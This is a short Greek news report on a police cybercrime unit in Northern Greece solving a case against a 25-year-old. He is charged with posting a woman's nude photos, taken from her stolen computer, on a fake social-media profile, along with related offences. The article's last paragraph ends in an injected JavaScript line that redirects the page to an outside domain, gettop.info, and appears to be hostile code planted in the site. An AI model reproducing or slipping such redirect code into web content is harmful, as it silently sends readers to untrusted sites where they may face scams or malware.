Εξιχνίαση υπόθεσης πορνογραφίας ανηλίκων στη Β. Ελλάδα

0
6

 

Εξιχνιάστηκε από την Υποδιεύθυνση Δίωξης Ηλεκτρονικού Εγκλήματος Βορείου Ελλάδας, υπόθεση πορνογραφίας ανηλίκων, παράνομης πρόσβασης σε υπολογιστικά συστήματα και αδικημάτων σε βάρος ημεδαπής.

Σε βάρος 25χρονου σχηματίστηκε δικογραφία για τα αδικήματα της πορνογραφίας ανηλίκων, της παράνομης πρόσβασης σε υπολογιστικά συστήματα, της δυσφήμισης και της συκοφαντικής δυσφήμισης καθώς και παράβασης της νομοθεσίας για τα προσωπικά δεδομένα.

Οι Αρχές κινητοποιήθηκαν έπειτα από καταγγελία της 24χρονης ότι άγνωστο άτομο δημοσίευσε σε ψευδεπίγραφο προφίλ σε ιστοσελίδα κοινωνικής δικτύωσης, γυμνές φωτογραφίες της, που τις είχε αποθηκεύσει σε ηλεκτρονικό υπολογιστή που είχε κλαπεί από το σπίτι της.

Από την ψηφιακή έρευνα που ακολούθησε, εντοπίστηκαν τα ίχνη του 25χρονου σε περιοχή της Μακεδονίας, ενώ στις έρευνες που πραγματοποιήθηκαν παρουσία δικαστικού λειτουργού, στο σπίτι και την εργασία του εξακριβώθηκε η εμπλοκή του στις καταγγελλόμενες πράξεις. Κατασχέθηκαν δυο εξωτερικοί σκληροί δίσκοι οι οποίοι εστάλησαν στα εγκληματολογικά εργαστήρια, για περαιτέρω εξέταση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here